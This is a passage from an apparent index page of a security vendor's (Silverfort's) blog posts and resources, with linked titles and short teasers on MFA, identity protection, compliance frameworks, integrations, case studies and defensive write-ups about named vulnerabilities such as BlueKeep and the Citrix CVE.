prestigious PCI London event.... - [Silverfort Named Winner of the PCI 2020 Awards for Excellence](https://www.silverfort.com/blog/silverfort-named-winner-of-the-pci-2020-awards-for-excellence-2/): Silverfort has been named a winner of the PCI 2020 Awards for Excellence at this year’s prestigious PCI London event.... - [Reducing the Password Footprint in a Windows Environment](https://www.silverfort.com/blog/reducing-the-password-footprint-in-a-windows-environment/): *****By Yaron Kassner, CTO and Co Founder, Silverfort***** The word password-less gets thrown around a lot lately, and while everybody... 
- [Reducing the Password Footprint in a Windows Environment](https://www.silverfort.com/blog/reducing-the-password-footprint-in-a-windows-environment-2/): *****By Yaron Kassner, CTO and Co Founder, Silverfort***** The word password-less gets thrown around a lot lately, and while everybody... - [Security Advisory: Vulnerability in Citrix Application Delivery Controller and Citrix Gateway leading to arbitrary code execution (CVE-2019-19781)](https://www.silverfort.com/blog/recommended-mitigation-steps-for-vulnerability-in-citrix-adc-and-citrix-gateway-cve-2019019781/): *****By Yaron Kassner, CTO and Co Founder, Silverfort***** A recently identified vulnerability in Citrix Application Delivery Controller (ADC) formerly known... - [Security Advisory: Vulnerability in Citrix Application Delivery Controller and Citrix Gateway leading to arbitrary code execution (CVE-2019-19781)](https://www.silverfort.com/blog/recommended-mitigation-steps-for-vulnerability-in-citrix-adc-and-citrix-gateway-cve-2019019781-2/): A recently identified vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known... - [PAM is king, but who is protecting the king?](https://www.silverfort.com/blog/pam-is-king-but-who-is-protecting-the-king/): — By Jonathan Nativ, Sales Director, APAC, Silverfort — In the game of chess, the king is the most important... - [Detecting and Predicting Malicious Access in Enterprise Networks Using the Louvain Community Detection Algorithm](https://www.silverfort.com/blog/detecting-and-predicting-malicious-access-in-enterprise-networks-using-the-louvain-community-detection-algorithm/): By Gal Sadeh, Sr. Data Scientist, Silverfort Many data breaches start with gaining access to an insignificant computer and propagating... 
- [Detecting and Predicting Malicious Access in Enterprise Networks Using the Louvain Community Detection Algorithm](https://www.silverfort.com/blog/detecting-and-predicting-malicious-access-in-enterprise-networks-using-the-louvain-community-detection-algorithm-2/): By Gal Sadeh, Sr. Data Scientist, Silverfort Many data breaches start with gaining access to an insignificant computer and propagating... - [Blocking Office365 Attacks (CVE-2017-11774) with MFA](https://www.silverfort.com/blog/blocking-office365-attacks-cve-2017-11774-with-mfa/): US Cyber command has recently published a security alert on Twitter regarding abuse of an Outlook vulnerability https://twitter. com/CNMF_VirusAlert/status/1146130046127681536. This... - [Blocking Office365 Attacks (CVE-2017-11774) with MFA](https://www.silverfort.com/blog/blocking-office365-attacks-cve-2017-11774-with-mfa-2/): US Cyber command has recently published a security alert on Twitter regarding abuse of an Outlook vulnerability https://twitter. com/CNMF_VirusAlert/status/1146130046127681536. This... - [Zero-Touch Secure Authentication for ‘Lift-and-Shift’ Cloud Migrations](https://www.silverfort.com/blog/zero-touch-secure-authentication-for-lift-and-shift-cloud-migrations/): With data breaches appearing in the headlines almost on a daily basis, many have concerns about cloud security. There is... - [Zero-Touch Secure Authentication for ‘Lift-and-Shift’ Cloud Migrations](https://www.silverfort.com/blog/zero-touch-secure-authentication-for-lift-and-shift-cloud-migrations-2/): With data breaches appearing in the headlines almost on a daily basis, many have concerns about cloud security. There is... 
- [How Silverfort Overcomes the New Lock Screen Bypass Vulnerability (CVE-2019-9510)](https://www.silverfort.com/blog/how-silverfort-overcomes-the-new-lock-screen-bypass-vulnerability/): Last week, CERT released an advisory about a Windows vulnerability (CVE-2019-9510) that allows effectively bypassing Multi-Factor Authentication (MFA) to Windows... - [How Silverfort Overcomes the New Lock Screen Bypass Vulnerability (CVE-2019-9510)](https://www.silverfort.com/blog/how-silverfort-overcomes-the-new-lock-screen-bypass-vulnerability-2/): Last week, CERT released an advisory about a Windows vulnerability (CVE-2019-9510) that allows effectively bypassing Multi-Factor Authentication (MFA) to Windows... - [The ‘BlueKeep’ Vulnerability: Keeping Your Systems Secure](https://www.silverfort.com/blog/the-bluekeep-vulnerability-keeping-your-systems-secure/): By Yaron Kassner, CTO and Co Founder, Silverfort On May 14th, 2019 Microsoft issued a patch against the so-called BlueKeep... - [Silverfort Named a Gartner Cool Vendor in Identity and Access Management](https://www.silverfort.com/blog/silverfort-named-gartner-cool-vendor/): By Dana Tamir, VP Market Strategy, Silverfort Gartner has just named Silverfort a “Cool Vendor” in Identity and Access Management... - [Silverfort Named a Gartner Cool Vendor in Identity and Access Management](https://www.silverfort.com/blog/silverfort-named-gartner-cool-vendor-2/): By Dana Tamir, VP Market Strategy, Silverfort Gartner has just named Silverfort a “Cool Vendor” in Identity and Access Management... - [The ‘BlueKeep’ Vulnerability: Keeping Your Systems Secure](https://www.silverfort.com/blog/the-bluekeep-vulnerability-keeping-your-systems-secure-2/): By Yaron Kassner, CTO and Co Founder, Silverfort On May 14th, 2019 Microsoft issued a patch against the so-called BlueKeep... 
- [Passwords: Can’t Rely On Them, Can’t Live Without Them...](https://www.silverfort.com/blog/passwords-cant-rely-on-them-cant-live-without-them/): By Dana Tamir, VP Market Strategy, SilverfortMay 2nd, 2019 is national password day – a good opportunity to discuss our... - [3 Ways Agentless MFA Successfully Tackles PCI DSS 8.3.1 Challenges](https://www.silverfort.com/blog/3-ways-agentless-mfa-successfully-tackles-pci-dss-8-3-1-challenges/): One of the most common questions we get from our customers, is regarding requirement 8. 3. 1 of PCI DSSv3.... - [3 Ways Agentless MFA Successfully Tackles PCI DSS 8.3.1 Challenges](https://www.silverfort.com/blog/3-ways-agentless-mfa-successfully-tackles-pci-dss-8-3-1-challenges-2/): One of the most common questions we get from our customers, is regarding requirement 8. 3. 1 of PCI DSSv3.... - [Simplify and Strengthen Authentication to CyberArk with Silverfort’s Agentless MFA](https://www.silverfort.com/blog/simplify-strengthen-authentication-cyberark-silverforts-agentless-mfa/): We are proud to announce Silverfort’s integration with CyberArk. The joint Silverfort and CyberArk Privileged Access Security Solution enables our... - [Simplify and Strengthen Authentication to CyberArk with Silverfort’s Agentless MFA](https://www.silverfort.com/blog/simplify-strengthen-authentication-cyberark-silverforts-agentless-mfa-2/): We are proud to announce Silverfort’s integration with CyberArk. The joint Silverfort and CyberArk Privileged Access Security Solution enables our... - [Passwords: Can’t Rely On Them, Can’t Live Without Them...](https://www.silverfort.com/blog/passwords-cant-rely-on-them-cant-live-without-them-2/): By Dana Tamir, VP Market Strategy, SilverfortMay 2nd, 2019 is national password day – a good opportunity to discuss our... 
- [How to Stop Iranian ‘SamSam’ Hackers from Taking your Network for Ransom](https://www.silverfort.com/blog/how-to-stop-iranian-samsam-hackers-from-taking-your-network-for-ransom/): SamSam – sounds cute, right? Well, it’s not. SamSam is a destructive ransomware that affected more than 200 victims across... - [PAM is king, but who is protecting the king?](https://www.silverfort.com/blog/pam-is-king-but-who-is-protecting-the-king-2/): — By Jonathan Nativ, Sales Director, APAC, Silverfort — In the game of chess, the king is the most important... - [Rethinking MFA](https://www.silverfort.com/blog/rethinking-mfa/): We all dream of a world where we can trust everyone who accesses our corporate resources - but the reality... - [How to Stop Iranian ‘SamSam’ Hackers from Taking your Network for Ransom](https://www.silverfort.com/blog/how-to-stop-iranian-samsam-hackers-from-taking-your-network-for-ransom-2/): SamSam – sounds cute, right? Well, it’s not. SamSam is a destructive ransomware that affected more than 200 victims across... - [Rethinking MFA](https://www.silverfort.com/blog/rethinking-mfa-2/): We all dream of a world where we can trust everyone who accesses our corporate resources - but the reality... --- ## Resources - [Beyond the Perimeter: Modernizing Active Directory Protection Against Lateral Movement and Privileged Access Abuse](https://www.silverfort.com/resources/beyond-the-perimeter-modernizing-active-directory-protection-against-lateral-movement-and-privileged-access-abuse/): Identity is the new perimeter – and attackers know it. Breaches don’t end with the first compromise. Adversaries move laterally... - [Accelerating Passkey Adoption with Microsoft, Yubico & Silverfort](https://www.silverfort.com/resources/accelerating-passkey-adoption-with-microsoft-yubico-silverfort/): Strengthen your cyber defences with FIDO2 and passkeys Adopting phishing-resistant authentication methods with FIDO2 and passkeys is essential to safeguarding... 
- [How a leading US healthcare organization secured privileged access to ensure HIPAA compliance](https://resources.silverfort.com/case-study-leading-us-healthcare-organization-secured-privileged-access-to-ensure-hipaa-compliance/case-study-home#new_tab) - [SWIFT Customer SecurityControls Framework (CSCF) v2025](https://www.silverfort.com/resources/swift-customer-securitycontrols-framework-cscf-v2025/): Complying with SWIFT’s updated Customer Security Controls Framework (CSCF) is no small feat—especially when legacy systems and identity gaps get... - [Identity Security at a Crossroads: Balancing Stability, Agility, and Security](https://www.silverfort.com/resources/identity-security-at-a-crossroads-esg-research/): Workforce identity security is in a state of flux, with changing enterprise infrastructure, an expanding application portfolio to integrate, and... - [Closing identity security gaps: How Ping Identity and Silverfort protect every access point](https://www.silverfort.com/resources/closing-identity-security-gaps-how-ping-identity-and-silverfort-protect-every-access-point/): Scroll down to watch the webinar, or head over to YouTube. - [How IRCEM strengthened identity security posture to meet compliance requirements and secure privileged accounts](https://resources.silverfort.com/case-study-how-ircem-strengthened-identity-security-posture/home#new_tab) - [Cloud Non-Human Identity (NHI) Security](https://www.silverfort.com/resources/cloud-non-human-identity-nhi-security/): Get control of cloud NHIs before they become a problem Non-human identities are powering your cloud, but who’s managing them?... - [Silverfort and Netskope’s risk intelligence integration](https://www.silverfort.com/resources/silverfort-and-netskopes-risk-intelligence-integration/): Silverfort and Netskope have integrated to help organizations enforce smarter, risk-based access decisions across cloud and hybrid environments. The integration... 
- [The Identity Security Buyer’s Guide and RFP Checklist](https://www.silverfort.com/resources/rfp-checklist/): No email address required! Most organizations operate with a hybrid, fragmented IAM infrastructure – making it a complex task for... - [Silverfort & CrowdStrike SIEM for risk and incident monitoring](https://www.silverfort.com/resources/silverfort-crowdstrike-siem-for-risk-and-incident-monitoring/): Streamline identity threat detection across your entire security stack Traditional IAM tools leave gaps. This solution brief shows how Silverfort... - [Silverfort & CrowdStrike Falcon EDR](https://www.silverfort.com/resources/silverfort-crowdstrike-falcon-edr/): Extend detection and response from endpoints to identity This solution brief reveals how Silverfort and CrowdStrike Falcon Insight work together... - [Enhancing security at Pembroke College, Cambridge: Strengthening MFA and identity security with Silverfort](https://resources.silverfort.com/case-study-pembroke-strengthens-mfa-and-identity-security-with-silverfort#new_tab) - [Identity-first incident response with Silverfort](https://www.silverfort.com/resources/identity-first-incident-response-with-silverfort/): Compromised identities are the entry point for nearly every cyberattack—and time is your most precious asset when responding. Silverfort’s Identity-First... 
- [Securing Invisible Identities: Best Practices for Protecting Service Accounts with Silverfort](https://www.silverfort.com/landing-page/webinar/unsichtbare-identitaten-absichern-dach-webcast-german-july-2025/)
- [Securing the Invisible Workforce: Best Practices for Service Account Protection with Silverfort](https://www.silverfort.com/landing-page/webinar/securing-the-invisible-workforce-webcast-english-july-2025/)
- [Silverfort and Ping Identity Integration](https://www.silverfort.com/resources/silverfort-and-ping-identity-integration/): What if PingID could protect every corner of your environment—from SaaS apps to the most legacy on-prem servers? Now it...
- [Accelerate your NIS2 compliance with Silverfort](https://www.silverfort.com/resources/accelerez-votre-mise-en-conformite-nis2-avec-silverfort/): According to some estimates, more than 15,000 organisations will be affected by the French transposition of NIS 2. The “essential entities”...
- [Introduction to Identity Protection in the Zero Trust Era: An Overview of Silverfort](https://www.silverfort.com/resources/introduction-to-identity-protection-in-the-zero-trust-era-japanese/): What is the essence of Zero Trust? And why is “identity” now the top priority? Through an overview of Silverfort, this seminar presents the challenges of modern cybersecurity strategy and their solutions in plain terms. Agenda
- [Silverfort & Cortex XSOAR](https://www.silverfort.com/resources/silverfort-cortex-xsoar/): Real-time identity threat response, now fully automated. Traditional IAM tools weren’t built to detect identity threats like lateral movement or...
- [Silverfort & Cortex XDR](https://www.silverfort.com/resources/silverfort-cortex-xdr/): Unified endpoint + identity defense to stop modern attacks. Endpoints and identities are often exploited together, but they’re still too...
- [Comply with Zero Trust Maturity Model (ZTMM) requirements with Silverfort](https://www.silverfort.com/resources/comply-with-zero-trust-maturity-model-ztmm-requirements-with-silverfort/): Developed by the CISA to guide U.S. federal agencies and adopted widely across critical industries like finance, energy, and...
- [Solving key identity security challenges in SMBs with Silverfort](https://www.silverfort.com/resources/solving-key-identity-security-challenges-in-smbs-with-silverfort/): Big identity challenges, SMB-ready solutions. Today’s small and medium-sized businesses (SMBs) face enterprise-level cyber threats—with a fraction of the resources....
- [Silverfort risk and incident notifications for Slack](https://www.silverfort.com/resources/silverfort-risk-and-incident-notifications-for-slack/): Stay ahead of identity threats with real-time Slack alerts. Security teams can’t afford to miss a beat. With Silverfort’s Risk...
- [Silverfort risk and incident notifications for Microsoft Teams](https://www.silverfort.com/resources/silverfort-risk-and-incident-notifications-for-microsoft-teams/): Supercharge Microsoft Teams with Silverfort risk alerts. Want to turn Microsoft Teams into a security command center? With Silverfort’s Risk...
- [Silverfort AI Agent Security](https://www.silverfort.com/resources/silverfort-ai-agent-security/): Confidently secure the next wave of AI innovation with Silverfort's AI Agent Security.
- [Identity security in retail: How to prevent ransomware and thwart lateral identity attacks](https://www.silverfort.com/resources/facing-and-overcoming-retail-identity-protection-challenges-2/): In the rapidly evolving threat landscape, retail companies have emerged as prime targets for identity threats, highlighting a concerning trend...
- [Comply with the Security of Critical Infrastructure (SOCI) Act Requirements with Silverfort](https://www.silverfort.com/resources/comply-with-the-security-of-critical-infrastructure-soci-act-requirements-with-silverfort/): Australia’s Security of Critical Infrastructure (SOCI) Act has transformed the regulatory landscape for operators of essential services. With expanded coverage...
- [Silverfort Authenticator for Microsoft Teams](https://www.silverfort.com/resources/silverfort-authenticator-for-microsoft-teams/): Introducing Silverfort Authenticator for Microsoft Teams, a seamless way to extend secure authentication flows into the collaboration tool your teams...
- [Silverfort and OneSpan FIDO2 Integration](https://www.silverfort.com/resources/silverfort-and-onespan-fido2-integration/): Looking to eliminate identity threats across your entire infrastructure — even the resources traditional MFA can’t reach? Silverfort and OneSpan...
- [Bridging on-prem authentication with CyberArk Identity](https://www.silverfort.com/resources/silverfort-cyberark-joint-solution-brief/): Seamlessly extend CyberArk Identity to on-prem resources. At Silverfort, we enable organizations to bring modern identity security to legacy environments....
- [An Identity Security Playbook: The What and The Why](https://www.silverfort.com/resources/an-identity-security-playbook-the-what-and-the-why/): Every security program needs a floor to stand on and a ceiling to grow into. In identity security, that floor...
- [Shining a light on the hidden risks of non-human identities](https://www.silverfort.com/resources/shining-a-light-on-the-hidden-risks-of-non-human-identities/): Non-human identities (NHIs) – like service accounts, API keys, certificates, tokens, automation scripts, and cloud roles – now outnumber human...
- [Solving key identity security challenges in state and local government with Silverfort](https://www.silverfort.com/resources/solving-key-identity-security-challenges-in-state-and-local-government-with-silverfort/): In 2024, 34% of U.S. state and local government organizations reported being hit by ransomware attacks, with the average...
- [Solving key identity security challenges in finance with Silverfort](https://www.silverfort.com/resources/solving-key-identity-security-challenges-in-finance-with-silverfort/): Financial services remains a top target for ransomware and credential-based attacks, with a sharp increase of 61% year-over-year in Q1...
- [Insecurity in the shadows: New data on the hidden risks of non-human identities](https://www.silverfort.com/landing-page/campaign/insecurity-in-the-shadows-report-download/)
- [Winning the Privileged Access Battle: From Firefighting to Field Control](https://www.silverfort.com/resources/winning-the-privileged-access-battle-from-firefighting-to-field-control/): Identity security has a privileged access problem. Faced with massive complexity in securing your most important infrastructure, current approaches to...
- [Protecting sensitive accounts without detours - Privileged Access rethought](https://www.silverfort.com/resources/schutz-sensibler-konten-ohne-umwege-privileged-access-neu-gedacht/): Administrator accounts are a prime target for attackers. If one is compromised, there is a risk of undetected access to the entire network – with serious consequences....
- [Get ahead of HIPAA’s new identity requirements](https://www.silverfort.com/resources/get-ahead-of-hipaas-new-identity-requirements/): Download the Free HIPAA Identity Compliance Cheat Sheet. Cyberattacks targeting healthcare are surging—and outdated HIPAA rules can’t keep up. Proposed...
- [Bridging on-prem authentication with Keyless Security](https://www.silverfort.com/resources/bridging-on-prem-authentication-with-keyless-security/): Explore how Silverfort’s Keyless bridge extends biometric, phishing-resistant MFA across your hybrid infrastructure—from cloud to legacy on-prem systems. This one-pager...
- [Microsoft & Silverfort Webinar: Best practices and challenges of AD tiering](https://www.silverfort.com/resources/microsoft-silverfort-webinar-meilleures-pratiques-et-challenges-du-tiering-ad/): As the identity attack surface continues to evolve with new methods of compromising organizations, the need for...
- [Secure identities, less risk – How to stop ransomware effectively](https://www.silverfort.com/resources/sichere-identitaten-weniger-risiko-so-stoppen-sie-ransomware-effektiv/): The cybersecurity landscape is changing rapidly, and identity security plays a decisive role in protecting against modern threats. In hybrid enterprise environments, ...
- [Cyber Assessment Framework (CAF) Compliance with Silverfort](https://www.silverfort.com/resources/cyber-assessment-framework-caf-compliance-with-silverfort/): As identity-based threats rise across critical infrastructure sectors, compliance with the UK’s Cyber Assessment Framework (CAF) is more vital—and complex—than...
- [Uncovering and Addressing the Blind Spots in Privileged Access Management](https://www.silverfort.com/resources/uncovering-and-addressing-the-blind-spots-in-privileged-access-management/): Many organizations depend on Privileged Access Management (PAM) to secure administrator accounts — but relying on PAM alone can leave...
- [Qualify for cyber insurance with fast and effective AD security](https://www.silverfort.com/resources/qualify-for-cyber-insurance-with-fast-and-effective-ad-security/): As cyber insurance requirements tighten, organizations are under pressure to demonstrate robust identity security—particularly within Active Directory (AD) environments. In...
- [Case Study: Trinity College Cambridge strengthens MFA and service account protection with Silverfort](https://www.silverfort.com/resources/case-study-trinity-college-cambridge-strengthens-mfa-and-service-account-protection-with-silverfort/): Trinity College Cambridge faced a critical challenge: securing privileged and service accounts in their on-prem Active Directory. While their cloud-based...
- [HIPAA Compliance 2.0: Is Your Identity Security Strategy Ready?](https://www.silverfort.com/resources/hipaa-compliance-2-0-is-your-identity-security-strategy-ready/): The newly proposed HIPAA security updates are being reviewed now, and they will demand more than just “check-the-box” compliance. Identity...
- [Securing privileged access—from blind spots to resilience](https://www.silverfort.com/resources/securing-privileged-access-from-blind-spots-to-resilience/): Securing privileged users in Active Directory is more critical than ever—but relying solely on Privileged Access Management (PAM) solutions leaves...
- [Securing the Identity Attack Surface: A deep dive into identity security by Francis Odum.](https://www.silverfort.com/resources/francis-odums-securing-the-identity-attack-surface-report/): Learn why leading cybersecurity research and software analyst Francis Odum says that Silverfort is the “furthest along” in delivering a...
- [Unveiling NTLMv1 Vulnerabilities: Risks and Mitigation Strategies in Active Directory Environments](https://www.silverfort.com/landing-page/on-demand-webinar/unveiling-ntlmv1-vulnerabilities-risks-and-mitigation-strategies-in-active-directory-environments/): Despite Microsoft’s announcement of the deprecation of NTLMv1 due to its inherent security weaknesses, recent findings reveal that many organizations...
- [Identity Security Posture Management (ISPM) with Silverfort](https://www.silverfort.com/resources/identity-security-posture-management-with-silverfort/): Strengthen Your Identity Security Posture. In today’s complex hybrid environments, misconfigurations and legacy systems can leave organizations vulnerable to identity-based...
- [Non-Human Identity (NHI) Security with Silverfort](https://www.silverfort.com/resources/non-human-identity-nhi-security-with-silverfort/): Secure Your Non-Human Identities with Silverfort. Non-human identities (NHIs), such as service accounts and automated processes, are integral to modern...
- [The Identity Security Playbook](https://www.silverfort.com/resources/the-identity-security-playbook/): Your 5-Step Action Plan to a Sustainable Identity Security Strategy
- [Identity Threat Detection & Response (ITDR) with Silverfort](https://www.silverfort.com/resources/identity-threat-detection-response-with-silverfort/): Protect Your Organization from Identity Threats. Identity-based attacks are on the rise, targeting credentials, privileges, and access pathways. Silverfort’s Identity...
- [Beyond the perimeter: Addressing blind spots in identity security for 2025 and beyond](https://www.silverfort.com/resources/beyond-the-perimeter-addressing-blind-spots-in-identity-security-for-2025-and-beyond/): As the security attack landscape continues to evolve, identity security has emerged as the next critical frontier. With an anticipated...
- [US insurance provider enhances identity security posture with Authentication Firewall](https://www.silverfort.com/resources/us-insurance-provider-enhances-identity-security-posture-with-authentication-firewall/): When a trusted insurance provider sought to power up their identity security posture, they came to Silverfort. Led by their...
- [Universal Multi-Factor Authentication (MFA) with Silverfort](https://www.silverfort.com/resources/universal-multi-factor-authentication-mfa-with-silverfort/): Enhance Your Security with Universal MFA. In today’s evolving threat landscape, securing all access points is crucial. Silverfort’s Universal Multi-Factor...
- [CISO Perspective: Why Great Companies with Great Solutions Still Get Breached](https://www.silverfort.com/resources/ciso-perspective-why-great-companies-with-great-solutions-still-get-breached/): In today’s constantly shifting threat landscape, even the most well-prepared companies with the latest and greatest solutions can still fall...
- [Enhancing Microsoft’s ability to protect leaked credentials with Silverfort](https://www.silverfort.com/resources/enhancing-microsofts-ability-to-protect-leaked-credentials-with-silverfort/): Compromised credentials are still the #1 way attackers break in. What if you could block their use—on every system, in...
- [Preventing Privilege Escalation: Effective PAS Practices for Today’s Threat Landscape](https://www.silverfort.com/resources/preventing-privilege-escalation-effective-pas-practices-for-todays-threat-landscape/): As privileged accounts continue to be one of the highest-risk targets for cyberattacks, managing them effectively is more critical than...
- [Privileged Access Security (PAS)](https://www.silverfort.com/resources/privileged-access-security-pas/): Discover, classify, and enforce least privilege and Just-In-Time (JIT) access policies for all your privileged users. With Silverfort’s Privileged Access...
- [Beyond the Endpoint: A Deep Dive into Using Identity as the Basis for Incident Response](https://www.silverfort.com/resources/beyond-the-endpoint-a-deep-dive-into-using-identity-as-the-basis-for-incident-response/): Three-quarters of organizations face faster-moving cyber threats than ever, making rapid detection and response essential. Traditionally, response focused on endpoints,...
- [Comply with New York State Department of Health's Section 405.46 of Title 10 NYCRR](https://www.silverfort.com/resources/comply-with-new-york-state-department-of-healths-section-405-46-of-title-10-nycrr/): The New York State Department of Health (DOH)’s Title 10 NYCRR Section 405.46 requires healthcare facilities to implement strict...
- [How to Comply with New York State Department of Health’s Section 405.46 of Title 10 NYCRR with Silverfort](https://www.silverfort.com/resources/how-to-comply-with-new-york-state-department-of-healths-section-405-46-of-title-10-nycrr-with-silverfort/): The New York State Department of Health (DOH) established 10 NYCRR 405.46 in 1999, initially to safeguard patient rights...
- [How to comply with CMMC's Identity Security Requirements with Silverfort](https://www.silverfort.com/resources/how-to-comply-with-cmmcs-identity-security-requirements-with-silverfort/): The Cybersecurity Maturity Model Certification (CMMC) was established by the U.S. Department of Defense to bolster security in the...
- [Silverfort and Token2 Integration](https://www.silverfort.com/resources/silverfort-and-token2-integration/): FIDO2 tokens are a powerful defense—but what if you could use them to protect everything? This PDF explores how Silverfort...
- [Silverfort Identity Security for NIST SP 800-171](https://www.silverfort.com/resources/silverfort-identity-security-for-nist-sp-800-171/): NIST Special Publication 800-171, published in 2015 by the National Institute of Standards and Technology (NIST), offers a comprehensive framework...
- [From Breach to Recovery: Designing an Identity-Focused Incident Response Playbook](https://www.silverfort.com/resources/from-breach-to-recovery-designing-an-identity-focused-incident-response-playbook/): Traditional incident response plans are no longer enough. Cybercriminals are relentlessly targeting identities, exploiting stolen credentials and weak access points...
- [Silverfort Smart Policy for Service Accounts](https://www.silverfort.com/resources/silverfort-smart-policy-for-service-accounts/): Scale service account protection in bulk with behavior-based policies that never interfere with service operations. With Silverfort’s Smart Policy, customers...
- [Identity Has Become the Prime Target of Threat Actors | Silverfort + AIG](https://www.silverfort.com/resources/identity-has-become-the-prime-target-of-threat-actors-silverfort-aig/): As the frequency and sophistication of ransomware attacks escalate, identity has emerged as the primary target for cybercriminals. With over...
- [Silverfort's Okta Bridge](https://www.silverfort.com/resources/silverforts-okta-bridge/): Bring Okta’s web SSO flows to your on-prem world for real-time protection against identity-based attacks.
- [Silverfort's PingFederate Bridge](https://www.silverfort.com/resources/silverforts-pingfederate-bridge/): Extend PingFederate web SSO flows to every corner of your environment
- [Meeting the Identity Security Requirements of the CJIS Security Policy with Silverfort](https://www.silverfort.com/resources/meeting-the-identity-security-requirements-of-the-cjis-security-policy-with-silverfort/): CJIS compliance is a set of minimum requirements for accessing and handling Criminal Justice Information (CJI), which is any information...
- [Re-Evaluate Your MFA Protection](https://www.silverfort.com/resources/re-evaluate-your-mfa-protection-ppc/): MFA protection is ultimately only as strong as its weakest link. Without an MFA deployment that covers all organizational resources,...
- [Overcoming the Security Blind Spots of Service Accounts](https://www.silverfort.com/resources/overcoming-the-security-blind-spots-of-service-accounts-ppc/): Within the challenge of Active Directory protection, service accounts have emerged as a pressing concern for identity and security stakeholders....
- [Solving the Top Five PAM Challenges of Identity Teams](https://www.silverfort.com/resources/solving-the-top-five-pam-challenges-of-identity-teams-ppc/): Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring...
- [Why Identity Security Is A Necessity](https://www.silverfort.com/resources/why-identity-security-is-a-necessity/): Identity security has become a top priority for all organizations. Traditional identity controls do not provide complete coverage, leaving critical...
- [Safe and Impact-Free Usage of Silverfort on Your Domain Controllers](https://www.silverfort.com/resources/safe-and-impact-free-usage-of-silverfort-on-your-domain-controllers/): Ensuring your Active Directory Domain Controllers are secure and stable is more critical than ever. Silverfort understands the delicate balance...
- [Data#3 and Silverfort: Implementing World-Leading Identity Protection with The Southport School](https://www.silverfort.com/resources/data3-and-silverfort-implementing-world-leading-identity-protection-with-the-southport-school/): Discover how Silverfort and Data#3, leading cloud solutions and ICT service providers in Australia, are working together to bring best-in-class...
- [Why Silverfort](https://www.silverfort.com/resources/why-silverfort/): Traditional identity controls fall short of providing complete coverage, leaving critical resources exposed to malicious access. With Silverfort, organizations can...
- [Silverfort for Microsoft Sentinel and Security Copilot](https://www.silverfort.com/resources/silverfort-for-microsoft-sentinel-and-security-copilot/): Traditional IAM solutions often lack the depth needed to detect ongoing malicious activity, particularly identity-based attacks. Silverfort bridges this gap...
- [Silverfort Identity Security for the NIST Cybersecurity Framework 2.0](https://www.silverfort.com/resources/silverfort-identity-security-for-the-nist-cybersecurity-framework-2-0/): Align with NIST 2.0 and secure every identity with confidence. The NIST Cybersecurity Framework 2.0 is here, and...
- [Gain End-to-End Visibility Across Your Environment with Silverfort](https://www.silverfort.com/resources/gain-end-to-end-visibility-across-your-environment-with-silverfort/): Security starts with visibility. If you don’t have full visibility across your environments, you are essentially operating in the dark....
- [Webinar: Top 5 Evaluation Criteria for ITDR Solutions](https://www.silverfort.com/resources/webinar-top-5-evaluation-criteria-for-itdr-solutions/): In today’s digital landscape, identity threats are more prevalent than ever. Protecting your digital identity is crucial as lateral movement...
- [London Borough of Waltham Forest and Silverfort: A Case Study](https://www.silverfort.com/resources/london-borough-of-waltham-forest-and-silverfort-a-case-study/): Following ransomware attacks targeting a number of schools in the borough, the London Borough of Waltham Forest needed to strengthen...
- [Identity Threat Detection and Response (ITDR): Protecting the Exposed Attack Surface](https://www.silverfort.com/resources/identity-threat-detection-and-response-itdr-protecting-the-exposed-attack-surface-thn-nf/): Identity threats that utilize compromised credentials for malicious access to targeted resources have become the chief concern for organizations’...
- [Silverfort's Authentication Firewall](https://www.silverfort.com/resources/silverforts-authentication-firewall/): Strengthen Access Control with Silverfort’s Authentication Firewall. In today’s dynamic threat landscape, enforcing granular access control is essential to protect...
- [Leading Gaming Company Extends MFA Protection to Core Legacy Applications and Bridges On-Prem Resources to Entra ID with Silverfort](https://www.silverfort.com/resources/leading-gaming-company-extends-mfa-protection-to-core-legacy-applications-and-bridges-on-prem-resources-to-entra-id-with-silverfort/): A leading gaming company that develops immersive free-to-play social and mobile games sought to implement MFA protection across all users...
- [Silverfort and Thales FIDO2 Integration](https://www.silverfort.com/resources/silverfort-and-thales-fido2-integration/): FIDO2 hardware-backed authentication is the gold standard. But what if you could apply it to every system—no matter how old...
- [Shannon Medical Center and Silverfort: A Case Study](https://www.silverfort.com/resources/shannon-medical-center-and-silverfort-a-case-study/): As a prominent healthcare provider, Shannon Medical Center needed to increase its overall security posture. This meant applying MFA protection...
- [Identity Protection for Financial Services: Key Insights from the State of the Identity Attack Surface Report](https://www.silverfort.com/resources/identity-protection-for-financial-services-key-insights-from-the-state-of-the-identity-attack-surface/): Cyberattacks on financial institutions are highly frequent due to the large amount of sensitive financial information and assets they hold....
- [The Role Identity Plays in Nearly Every Attack—Including Ransomware](https://www.silverfort.com/resources/the-role-identity-plays-in-nearly-every-attack-including-ransomware/): Watch this short video about Unified Identity Protection with Silverfort.
- [Top 5 Identity Protection Challenges for Manufacturing Organizations](https://www.silverfort.com/resources/top-identity-protection-challenges-for-manufacturing/): It is common knowledge that manufacturing is one of the most targeted verticals and that threat actors launch data theft...
- [Womble Bond Dickinson LLP and Silverfort: A Case Study](https://www.silverfort.com/resources/womble-bond-dickinson-and-silverfort-case-study/): Womble Bond Dickinson (UK) LLP is a transatlantic law firm that provides the breadth of legal experience and services to...
- [West Valley School District and Silverfort: A Case Study](https://www.silverfort.com/resources/west-valley-school-district-silverfort-a-case-study/): West Valley School District Extends MFA Protection to All Faculty Users While Securing Service Accounts. West Valley School District 208...
- [Leading Telecom Provider and Silverfort: A Case Study](https://www.silverfort.com/resources/leading-telecom-provider-and-silverfort-a-case-study/): Due to the many identity protection challenges and the awareness of their evolving threat landscape, a leading telecom provider security...
- [Advantages and Limitations of MFA: Exploring Common Bypass Techniques and Security Counter Measures](https://www.silverfort.com/resources/advantages-and-limitations-of-mfa-exploring-common-bypass-techniques-and-security-counter-measures/): One of the most common identity security controls recommended is to implement MFA for at least those with access to...
- [360 MFA protection for OT environments](https://www.silverfort.com/resources/360-mfa-protection-for-ot-environments/): Legacy systems, air-gapped networks, and MFA requirements don’t have to clash. This solution brief introduces how Silverfort delivers true 360°...
- [Solving Education's Key Identity Protection Challenges with Silverfort](https://www.silverfort.com/resources/solving-educations-key-identity-protection-challenges/): The education sector is an increasingly lucrative target for ransomware and data breaches. Attack volume increased by 179% in 2023,...
